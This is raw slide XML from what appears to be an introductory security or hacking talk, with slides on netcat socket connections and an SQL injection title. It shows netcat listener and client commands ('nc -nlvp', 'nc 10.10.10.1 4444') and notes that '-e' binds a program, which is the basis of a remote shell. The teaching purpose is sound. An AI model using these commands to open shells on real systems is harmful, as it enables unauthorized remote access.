            <a:ext cx="917783" cy="876945"/>
            <a:chOff x="9028541" y="2937510"/>
            <a:chExt cx="2521200" cy="2409016"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rounded Rectangle 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0527610-6D32-F446-B75C-C445BC15B9FC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9028541" y="2937510"/>
              <a:ext cx="2521200" cy="24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logo&#10;&#10;Description automatically generated">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82B73F01-D235-C14B-A896-1F3F67CCC80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233984" y="3082266"/>
              <a:ext cx="2107120" cy="2107120"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56F9DBA6-625B-CB4C-B709-1B01C3FD8E50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11537220" y="2306063"/>
            <a:ext cx="184731" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB0A05F2-2DDA-CE43-8C5E-245461E784CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9366883" y="2099585"/>
            <a:ext cx="793764" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2F82CB4-FBA6-FC48-B391-D7F680F2F376}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10445861" y="3189963"/>
            <a:ext cx="1309777" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Listener</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>10.10.10.1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC02D05F-2820-AB4A-935E-6B1D911FEA1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10516490" y="2041209"/>
            <a:ext cx="3165220" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1"/>
              <a:t>lp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t> 4444</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="TextBox 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8806DBD9-44D1-3142-99CE-F2554426BF33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8831059" y="811468"/>
            <a:ext cx="2674452" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t> 10.10.10.1 4444</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="21" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27D9080B-AC87-3647-BE21-3408F2EE9F03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2721722138"/>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25996939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EC0B-D54E-4C45-B3AB-B5A9AD0BF8DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="286603"/>
            <a:ext cx="10058400" cy="1450757"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Introduction &amp; Agenda</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BB81B54-7D44-4797-9279-A7368579C771}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="82751348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00019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screenshot of a cell phone&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C2DD1C3-49DF-EC46-9280-116DA464240A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4860642" y="3807411"/>
            <a:ext cx="7067104" cy="2261473"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67BFEEC4-803A-9E4A-98DF-ED7AE9C73C0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816269" y="1043427"/>
            <a:ext cx="6630231" cy="3342747"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Socket Connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”Swiss Army knife of hackers”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Listener (server)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="300">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nlvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> [PORT no]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Numeric, listener, verbose, port [port no]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> [IP] [PORT]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Can use –e to bind a program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="35" name="Group 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFDD368F-A060-BD4F-8E73-B24F54FA4B47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10651470" y="2348986"/>
            <a:ext cx="915044" cy="897134"/>
            <a:chOff x="9806296" y="816993"/>
            <a:chExt cx="1200150" cy="1280291"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Rounded Rectangle 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF0099A1-7D55-5049-A7CD-F4FE7FEAC264}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9886306" y="816993"/>
              <a:ext cx="1040130" cy="120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3D469499-29B8-2A45-80ED-FF52919BFDFA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="9806296" y="897134"/>
              <a:ext cx="1200150" cy="1200150"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="38" name="Group 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C93137CD-FAB7-ED44-A0B4-091DFE8C32CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9318812" y="1169945"/>
            <a:ext cx="917783" cy="876945"/>
            <a:chOff x="9028541" y="2937510"/>
            <a:chExt cx="2521200" cy="2409016"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="Rounded Rectangle 38">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20AED61E-60D1-FB40-BB1E-C0532611AAA3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9028541" y="2937510"/>
              <a:ext cx="2521200" cy="2409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close up of a logo&#10;&#10;Description automatically generated">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDAAE632-63EF-3F42-A31A-35E2FE0E22E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233984" y="3082266"/>
              <a:ext cx="2107120" cy="2107120"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="TextBox 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{555F7140-57A3-474D-97B8-FA69EC67F0CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11537220" y="2306063"/>
            <a:ext cx="184731" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="TextBox 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7871F28-970D-C34A-A1D6-4086E2ABAC40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9366883" y="2099585"/>
            <a:ext cx="793764" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="TextBox 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9953CAF-93DD-3D4B-8426-4EBE69C24EB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10445861" y="3189963"/>
            <a:ext cx="1309777" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Listener</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>10.10.10.1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="TextBox 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3823D481-C4D8-FB40-890D-CB0CD9DA8B92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10516490" y="2041209"/>
            <a:ext cx="3165220" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1"/>
              <a:t>lp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t> 4444</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="TextBox 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E871BB8F-9583-B546-95BE-B288D75E17FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8831059" y="811468"/>
            <a:ext cx="2674452" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t> 10.10.10.1 4444</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="21" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8970FBDF-5C4E-6D4B-A4F7-E10FE19FEB88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2721722138"/>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5500346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F8401C5-AA07-D943-8C2A-102391D93D13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3043877595"/>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descr="Needle">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F81E5D2-F58D-2445-A0F6-6D0DA79D3100}"/>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816270" y="959547"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C41B9C53-E184-C14B-9112-D7A2F06D2B80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5730670" y="1268078"/>
            <a:ext cx="2408032" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36283588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F8401C5-AA07-D943-8C2A-102391D93D13}"/>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descr="Needle">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F81E5D2-F58D-2445-A0F6-6D0DA79D3100}"/>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816270" y="959547"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C41B9C53-E184-C14B-9112-D7A2F06D2B80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5730670" y="1268078"/>
            <a:ext cx="2408032" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DC3D0D0-5C08-E74C-9BB6-78EE18F619A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4874099" y="2425921"/>
            <a:ext cx="6836655" cy="2104376"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
